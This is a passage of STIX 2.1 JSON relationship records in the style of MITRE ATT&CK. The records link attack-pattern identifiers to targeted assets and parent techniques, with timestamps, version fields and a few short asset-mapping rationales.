"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T20:07:48.301Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ab390887-afc0-4715-826d-b1b167d522ae", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--7d8c3d33-941d-4654-b7f4-74381905c98d", "created": "2020-01-28T17:05:15.051Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--6495ae23-3ab4-43c5-a94f-5638a2c31fd2", "target_ref": "attack-pattern--799ace7f-e227-4411-baa0-8868704f2a69", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--7dd11d5e-1c1c-4f94-b4bf-4fd59988539b", "created": "2024-04-09T20:53:54.209Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2024-04-09T20:53:54.209Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--fab8fc7d-f27f-4fbb-9de6-44740aade05f", "target_ref": "x-mitre-asset--986c455b-0f43-42b6-8360-33ac48bd9990", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--7dee3da3-7e24-4dc5-811f-61fad028560b", "created": "2020-03-27T21:16:13.291Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--c48a67ee-b657-45c1-91bf-6cdbe27205f8", "target_ref": "attack-pattern--457c7820-d331-465a-915e-42f85500ccc4", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--7ebee5d3-ce7f-436c-8b4a-087363d6b858", "created": "2023-09-29T16:32:46.335Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T16:32:46.335Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--2dc2b567-8821-49f9-9045-8740f3d0b958", "target_ref": "x-mitre-asset--973bc51e-c41e-4cec-ac03-9389c71f3d0d", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--7ed1ad67-942a-424e-ad81-8b69a4f0c706", "created": "2023-09-28T20:28:16.122Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T20:28:16.122Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b52870cc-83f3-473c-b895-72d91751030b", "target_ref": "x-mitre-asset--75f810ad-b678-4c57-b93b-fdc79bba0c04", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--7efa1a31-da21-4925-aab0-96a012d5b2a7", "created": "2023-09-29T17:43:22.756Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T17:43:22.756Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b14395bd-5419-4ef4-9bd8-696936f509bb", "target_ref": "x-mitre-asset--68388d4f-8138-420b-be2b-5a7dfe9ff6b4", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--7f297acc-8edb-4191-a8ce-3e867b2f20dc", "created": "2020-03-02T14:30:05.457Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--32ad5c86-2bcf-47d8-8fdc-d7f3d79a7490", "target_ref": "attack-pattern--ac9e6b22-11bf-45d7-9181-c1cb08360931", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--7f306f1f-bd04-460f-929a-621f458dcd04", "created": "2020-02-25T18:34:38.377Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--4d2a5b3e-340d-4600-9123-309dd63c9bf8", "target_ref": "attack-pattern--5b0ad6f8-6a16-4966-a4ef-d09ea6e2a9f5", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--8074bdff-7555-478e-a45e-bb042e5719ab", "created": "2020-10-02T16:57:45.197Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--17fd695c-b88c-455a-a3d1-43b6cb728532", "target_ref": "attack-pattern--55fc4df0-b42c-479a-b860-7a6761bcaad0", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--808e8b62-14cc-44ad-a4f2-518685bef6c0", "created": "2024-05-23T03:48:14.726Z", "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-05-28T02:47:55.087Z", "description": "Asset Mapping Rationale: Adversaries may access network configuration files to collect sensitive data about the device and the network. ", "relationship_type": "targets", "source_ref": "attack-pattern--52759bf1-fe12-4052-ace6-c5b0cf7dd7fd", "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--80cf98bd-b7dc-45cf-91a6-4ab6b79a7f0b", "created": "2024-03-25T20:17:49.585Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2024-03-25T20:17:49.585Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1c5cf58c-a34a-40d7-82f4-f987cdfc2b91", "target_ref": "x-mitre-asset--f1315d02-9118-4e3b-8cdf-4c2d3f77ce41", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--81055366-e78b-40e0-a799-4b536ba03db3", "created": "2023-09-29T18:45:22.474Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T18:45:22.474Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--53a26eee-1080-4d17-9762-2027d5a1b805", "target_ref": "x-mitre-asset--f1315d02-9118-4e3b-8cdf-4c2d3f77ce41", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--817ae105-3ddf-4766-9d26-ca1ec3c64eb6", "created": "2023-09-28T20:11:42.579Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T20:11:42.579Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b9160e77-ea9e-4ba9-b1c8-53a3c466b13d", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--81806f43-c9aa-486e-8032-4e4665ba0d39", "created": "2023-09-29T18:43:13.760Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T18:43:13.760Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--493832d9-cea6-4b63-abe7-9a65a6473675", "target_ref": "x-mitre-asset--f1315d02-9118-4e3b-8cdf-4c2d3f77ce41", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--818ce9d0-8fc2-4a34-a062-f0e6995bdf32", "created": "2023-09-28T21:13:00.330Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T21:13:00.330Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b0628bfc-5376-4a38-9182-f324501cb4cf", "target_ref": "x-mitre-asset--ecb81a8b-022e-4529-a404-55cffca7d3a3", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--81a6a1c2-a834-47ed-ba5e-3048c62115ff", "created": "2022-03-04T18:30:39.100Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-05-24T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--7decb26c-715c-40cf-b7e0-026f7d7cc215", "target_ref": "attack-pattern--a10641f4-87b4-45a3-a906-92a149cb2c27", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--81ccd9e7-54a7-4b1c-8c69-7c238cac38f9", "created": "2020-02-05T19:35:59.214Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--72b5ef57-325c-411b-93ca-a3ca6fa17e31", "target_ref": "attack-pattern--543fceb5-cb92-40cb-aacf-6913d4db58bc", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--81dade3f-217d-41b8-8f70-b8695fc1d3f7", "created": "2020-03-13T19:41:38.021Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "target_ref": "attack-pattern--aedfca76-3b30-4866-b2aa-0f1d7fd1e4b6", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--82909cab-8740-41fd-8ee5-09359d2dd571", "created": "2021-08-18T14:06:45.442Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--c1b68a96-3c48-49ea-a6c0-9b27359f9c19", "target_ref": "attack-pattern--c877e33f-1df6-40d6-b1e7-ce70f16f4979", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--82e47c11-6480-4c0b-abd2-48868b9aecd4", "created": "2023-07-14T14:01:53.802Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-07-14T14:01:53.802Z", "description": "", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--35d30338-5bfa-41b0-a170-ec06dfd75f64", "target_ref": "attack-pattern--a10641f4-87b4-45a3-a906-92a149cb2c27", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--82ea5e2c-b5c2-467c-a7ec-bad7a38b743e", "created": "2022-07-29T19:32:11.660Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-07-29T19:32:11.660Z", "description": "", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--d2c4e5ea-dbdf-4113-805a-b1e2a337fb33", "target_ref": "attack-pattern--799ace7f-e227-4411-baa0-8868704f2a69", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--82f35485-e0de-4eb5-b643-e5608bfdcd94", "created": "2020-10-02T16:40:47.550Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--24286c33-d4a4-4419-85c2-1d094a896c26", "target_ref": "attack-pattern--09312b1a-c3c6-4b45-9844-3ccc78e5d82f", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--830006c6-3ea6-4680-a8f5-42fad83d5433", "created": "2020-03-17T13:03:26.149Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--06780952-177c-4247-b978-79c357fb311f", "target_ref": "attack-pattern--6747daa2-3533-4e78-8fb8-446ebb86448a", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": true, "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--83540a4e-9f12-4792-a541-910bb8fd0fe4", "created": "2020-03-02T19:05:18.286Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--2e34237d-8574-43f6-aace-ae2915de8597", "target_ref": "attack-pattern--a62a8db3-f23a-4d8f-afd6-9dbc77e7813b", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--8399c60f-6fd5-4060-9e5b-6661718a131a", "created": "2024-05-23T04:05:33.991Z", "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-05-28T02:49:52.006Z", "description": "Asset Mapping Rationale: Detection - Monitor and analyze traffic patterns and packet inspection associated to protocols that do not follow the expected protocol standards and traffic flows.", "relationship_type": "targets", "source_ref": "attack-pattern--b8902400-e6c5-4ba2-95aa-2d35b442b118", "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--83a964cb-730c-44e4-859b-b5246159396b", "created": "2023-09-29T17:59:43.275Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T17:59:43.275Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--5a2610f6-9fff-41e1-bc27-575ca20383d4", "target_ref": "x-mitre-asset--3a95f7e4-4877-4967-b2e8-e287976c3e64", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--844a7c42-0d65-4e10-b438-e7aad091e443", "created": "2020-02-12T18:56:59.293Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--2715c335-1bf2-4efe-9f18-0691317ff83b", "target_ref": "attack-pattern--1a80d097-54df-41d8-9d33-34e755ec5e72", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--84671396-a556-4a5d-9bb9-cac697277371", "created": "2023-09-29T16:31:12.255Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T16:31:12.255Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ba203963-3182-41ac-af14-7e7ebc83cd61", "target_ref": "x-mitre-asset--973bc51e-c41e-4cec-ac03-9389c71f3d0d", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--8474e6ef-39c4-4ecc-ba5a-cbd9b32b5c65", "created": "2023-09-28T21:11:15.610Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T21:11:15.610Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3405891b-16aa-4bd7-bd7c-733501f9b20f", "target_ref": "x-mitre-asset--ecb81a8b-022e-4529-a404-55cffca7d3a3", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--847b5ffb-77a2-4892-9e96-2b454a2c3f22", "created": "2020-12-17T15:24:12.424Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--1f9c2bae-b441-4f66-a8af-b65946ee72f2", "target_ref": "attack-pattern--94cb00a4-b295-4d06-aa2b-5653b9c1be9c", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--84fa50ff-bb84-4ab6-b759-658c57532c42", "created": "2023-09-29T16:32:09.319Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T16:32:09.319Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--d5a69cfb-fc2a-46cb-99eb-74b236db5061", "target_ref": "x-mitre-asset--973bc51e-c41e-4cec-ac03-9389c71f3d0d", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--84fd1e14-44a8-4eac-9bfc-67b50ea1acf7", "created": "2023-09-29T18:01:32.878Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T18:01:32.878Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--53a26eee-1080-4d17-9762-2027d5a1b805", "target_ref": "x-mitre-asset--3a95f7e4-4877-4967-b2e8-e287976c3e64", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--8530c1ea-fe9f-4b04-be34-7404d5e30e75", "created": "2023-09-29T17:59:22.291Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T17:59:22.291Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1b22b676-9347-4c55-9a35-ef0dc653db5b", "target_ref": "x-mitre-asset--3a95f7e4-4877-4967-b2e8-e287976c3e64", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--86a8d6aa-beff-4343-a0b2-dd099202b2dc", "created": "2023-09-28T19:58:13.866Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T19:58:13.866Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--38213338-1aab-479d-949b-c81b66ccca5c", "target_ref": "x-mitre-asset--986c455b-0f43-42b6-8360-33ac48bd9990", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--86c16ccf-cd37-4c5a-822b-034448056066", "created": "2020-01-24T14:26:51.389Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--f63fe421-b1d1-45c0-b8a7-02cd16ff2bed", "target_ref": "attack-pattern--b6301b64-ef57-4cce-bb0b-77026f14a8db", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--86c68d0b-23db-4f0a-9d06-a3832ec4e8ed", "created": "2020-10-02T15:47:59.629Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--36aa137f-5166-41f8-b2f0-a4cfa1b4133e", "target_ref": "attack-pattern--9d48cab2-7929-4812-ad22-f536665f0109", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--86e7a6d1-baa5-4a8d-9ba8-302fb0d72f9c", "created": "2023-09-28T21:09:41.659Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T21:09:41.659Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--3f1f4ccb-9be2-4ff8-8f69-dd972221169b", "target_ref": "x-mitre-asset--ecb81a8b-022e-4529-a404-55cffca7d3a3", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--87146c3d-f6f3-4800-b74c-50e1b1cbfa9f", "created": "2020-02-20T15:31:43.917Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--38eb0c22-6caf-46ce-8869-5964bd735858", "target_ref": 